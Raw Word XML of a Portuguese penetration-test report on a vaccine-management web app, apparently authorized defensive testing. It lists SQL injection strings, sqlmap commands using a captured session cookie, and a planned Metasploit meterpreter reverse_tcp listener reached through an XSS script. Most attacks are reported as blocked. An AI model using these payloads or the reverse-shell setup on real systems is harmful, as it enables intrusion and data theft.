      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1000’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000000"/>
        </w:rPr>
        <w:t>Passou no teste.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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00934569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>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00985A8F"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como entrada no campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="0063700A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>”, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao siape de usuários cadastrados. Comentários inline foram utilizados na tentativa de forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.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Entradas: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or 1=1 #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1000 or 1=1  --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594AD8" w:rsidRDefault="00594AD8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594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Essa parte é muito explicativa pra um charter de testes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> sem contar que existe duplicação do mesmo texto em outros charters</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>, eu removeria.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594AD8" w:rsidRPr="003A39F6" w:rsidRDefault="00594AD8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594AD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highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>O envio desses dados como entrada no campo do “</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>Siape</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">” tenta forçar o sistema a consultar não apenas os dados do usuário </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>correspondente ao</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve"> siape 1000</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">, mas de todos os usuários cadastrados na base de dados, uma vez que a instrução “1=1” será sempre verdadeira.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594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>Foi esperado que o sistema realizasse o tratamento de todos os caracteres informados como parâmetros regulares da consulta.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000000"/>
        </w:rPr>
        <w:t>Passou no teste. A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados.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84E80" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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Tela Consulta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</w:t>
      </w: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8"/>
        </w:rPr>
        <w:t>Exploração via Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00384E80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nos dias 19, 20 e 22/04/16.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3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oras</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> e 30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Utilizar a ferramenta S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>qlma</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>p para automatizar o processo de detecção de vulnerabilidades na tela de Consulta Servidor a partir de injeção de códigos SQL.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 xml:space="preserve">Verificar se a tela </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Consulta Servidor é vulnerável a injeção de código SQL e caso haja vulnerabilidade conseguir obter o nome do banco de dados utilizado pelo sistema.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Para realizar essa tentativa foi necessário utilizar a ferramenta Burp Suite para capturar as informações de cookie contidas no cabeçalho HTTP de uma requisição no momento em que a página d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consulta Servidor é acessada.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567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A3A330A" wp14:editId="25C50A0F">
            <wp:extent cx="5400040" cy="4060495"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="Imagem 23" descr="E:\MAPEAMENTO BURPSUITE\sql  map pagina consulta servidores\mapeamento dados a serem usados no sql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APEAMENTO BURPSUITE\sql  map pagina consulta servidores\mapeamento dados a serem usados no sqlmap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22</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Parâ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>metros obtidos através do Burp Suite</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">.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--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db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“--cookie” especifica </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">um cookie de sessão válido a ser passado para o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7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“--current -db”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> comando</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00FF1C9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Esperava-se que a tela de Consulta servidor não fosse vulnerável à injeção de SQL e consequentemente não fosse possível descobrir o nome do banco de dados utilizado pela aplicação.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noProof/>
          <w:lang w:eastAsia="pt-BR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>: Passou no teste. Não possível encontr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">ar vulnerabilidade na página e </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>consequentemente não foi possível descobrir o nome do banco de dados utilizado no sistema.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> As figuras 23 e 24 mostram os resultados do Sqlmap.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131FAC02" wp14:editId="411671F0">
            <wp:extent cx="5400040" cy="4054210"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="26" name="Imagem 26" descr="E:\MAPEAMENTO BURPSUITE\sql  map pagina consulta servidores\SQL MAP TELA CONSULTA SERVIDO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APEAMENTO BURPSUITE\sql  map pagina consulta servidores\SQL MAP TELA CONSULTA SERVIDOR\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23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Resultado exploração SQL Injection via Sqlmap – Parte 1.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151DDA48" wp14:editId="354BCAAF">
            <wp:extent cx="5400040" cy="4064727"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27" name="Imagem 27" descr="E:\MAPEAMENTO BURPSUITE\sql  map pagina consulta servidores\SQL MAP TELA CONSULTA SERVIDO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APEAMENTO BURPSUITE\sql  map pagina consulta servidores\SQL MAP TELA CONSULTA SERVIDOR\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24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Resultado exploração SQL Injection via Sqlmap – Parte 2.</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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3A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Repetir a ação da tentativa 2 e aumentar o nível de heurística </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>aplicada pelo Sqlmap na injeção de SQL para o valor máximo: 5.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3A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db  --level 5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“--current -db”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> comando utilizado</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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>evel 5” comando utilizado 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Esperava-se que a tela Consulta Servidor não fosse vulnerável à injeção de SQL e consequentemente não fosse possível descobrir o nome do banco de dados utilizado pela aplicação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>: Passou no te</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ste. Mesmo aumentando o nível da</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> heurística utilizada no escaneamento, não possível encontrar vulnerabilidade na página e consequentemente não foi possível descobrir o nome do banco de dados utilizado no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6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3A39F6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1416"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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4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5F6E06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L</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6E06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2 horas.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Explorar vulnerabilidade de XSS encontrado na tela Cadastro Lotes de Vacinas na Iteração 3.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A partir da máquina virtual que usa o Kali Linux, abrir uma conexão do Sistema de Vacinas fazendo uso de um listener da ferramenta Metasploit para acessar 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[PASSOS INCLUSOS]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 utilizados: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E52417" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7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 xml:space="preserve">Através do exploit disponível em </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit/Multi/Handler </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>com o payload windows-meterpreter-reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>usar o Metasploit para abrir um listener na porta 444 da máquina virtual que usa o Kali Linux;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00E52417" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr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Usar um comando GET de Javascript para abrir a conexão entre a máquina que hospeda a aplicação e a máquina virtual que usa Kali na porta indicada.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52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Dessa forma, será criado um listener que fica ouvindo conexões. Quando ocorre alguma conexão externa, ele executa o payload carregado no momento, que no caso é o windows/meterpreter/reverse_tcp que abre uma conexão reversa da máquina atacada para a máquina atacante.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 w:rsidRPr="00C3730D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&lt;script&gt;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();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lastRenderedPageBreak/>
        <w:t>r.open(</w:t>
      </w:r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O navegador bloqueia a requisição usando o filtro de CORS [6, 7].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37AB5CD6" wp14:editId="44155F99">
            <wp:extent cx="5724525" cy="1533525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="49" name="Imagem 4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46E12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046E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Figura 25 – Erro exibido no navegador na execução da requisição usando</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00046E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>o filtro de CORS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="22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Rodar o mesmo script utilizado na Tentativa 1 em um navegador diferente, para descobrir se o bloqueio da conexão ocorre em qualquer navegador ou apenas no Iceweasel.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Pr="0065063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Ao utilizar o navegador Firefox, o filtro de CORS impede a conexão.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00650630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8C6DC7" w:rsidRPr="00650630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 w:rsidRPr="00650630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030152F8" wp14:editId="64D89429">
            <wp:extent cx="5724525" cy="1533525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="48" name="Imagem 4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650630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 w:rsidRPr="00650630">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 26 – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Navegador Firefox impede a conexão quando o filtro de CORS é utilizado.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A38D8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A38D8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tela Cadastro Servidor – Exploração via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26/04/16.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Submeter entradas maliciosas no sistema através de injeção de códigos SQL na página Cadastro Servidor na tentativa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Entrada: teste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A aplicação realizou o tratamento de dados de entrada e não permitiu a injeção de instruções SQL através do campo de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Tentativa 2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>Inserir um texto com uma distribuição adequada de aspa simples e comentários inline como entrada no campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">”, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao nome de usuários </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>cadastrados. Comentários inline foram</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizados para tentar forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.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teste ‘ or 1=1 --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  <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>teste ‘ or 1=1  #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E5241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highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>O envio desses dados como entrada no campo do “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">” tenta forçar o sistema a consultar todos os usuários cadastrados na base de dados, uma vez que a instrução “1=1” será sempre verdadeira. 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E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>Foi esperado que o sistema realizasse o tratamento de todos os caracteres informados como parâmetros regulares da consulta.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906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">: Passou no teste. A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de </w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados.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Tentativa 3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 xml:space="preserve">É possível que a tela utilize Javascript para validar os dados informados pelo usuário do sistema no momento do cadastro. Então, para ignorar as possíveis validações existentes, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">o funcionamento do Javascript foi desabilitado </w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">no browser em utilização. Após isso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>foram</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> repetidos os procedimentos das tentativas 1 e 2.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 xml:space="preserve">teste ‘ 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teste ‘ or 1=1 --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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>teste ‘ or 1=1 #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  <w:lang w:val="en-US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E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Foi esperado que o sistema não realizasse o tratamento de todos os caracteres informados como parâmetros regulares da consulta, então um erro fosse exibido na aplicação.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E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Não p</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>assou no teste. Nada aconteceu. Com o Javascript desabilitado no navegador a página não realizou nenhuma requisição.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 xml:space="preserve">Tentativa 4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 xml:space="preserve">Com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">a função de </w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Javascript habilitado no browser, tentar provocar uma falha no momento de cadastro de dados, através da passagem de instruções </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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Siape”</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58"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Entradas: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1231 ); select * from usuarios; --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); select * from usuarios; #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E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Foi esperado que o sistema não realizasse o tratamento de todos os caracteres informados como parâmetros regulares da consulta, então um erro fosse exibido na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Pr="00564D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Passou no teste.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Não foi possível descobrir dados de outros servidores cadastrados na base de dados através da instrução de consulta fornecida ao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 xml:space="preserve">. Entretanto, </w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">devido à falta de tratamento adequado para dados inválidos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</w:rPr>
        <w:t>” o seguinte erro foi exibido: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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Erro:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data too long for column ‘id’ at row 1.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Dessa forma foi</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> possível identificar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">que o campo </w:t>
      </w:r>
      <w:r w:rsidRPr="00564D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>“Siape”</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, no banco de dados corresponde à coluna ‘id’.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softHyphen/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Tentativa 6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a ferramenta Sqlmap para realizar a tentativa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52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Salvar a requisição POST capturada pela ferramenta Burp Suite em um arquivo a parte para utilizar no Sqlmap posteriormente.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nome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siape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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>qlmap -r paramsTelaConsServidor -p cpf --dbms=msql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</w:t>
      </w:r>
      <w:r w:rsidRPr="003D141C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>aramsTelaConsServidor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Pr="003D141C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3D141C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">“--current-db” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado para </w:t>
      </w:r>
      <w:r w:rsidRPr="003D141C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>descobrir qual o banco da aplicação alvo.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63B8DF35" wp14:editId="4657DDD4">
            <wp:extent cx="4934309" cy="3704857"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
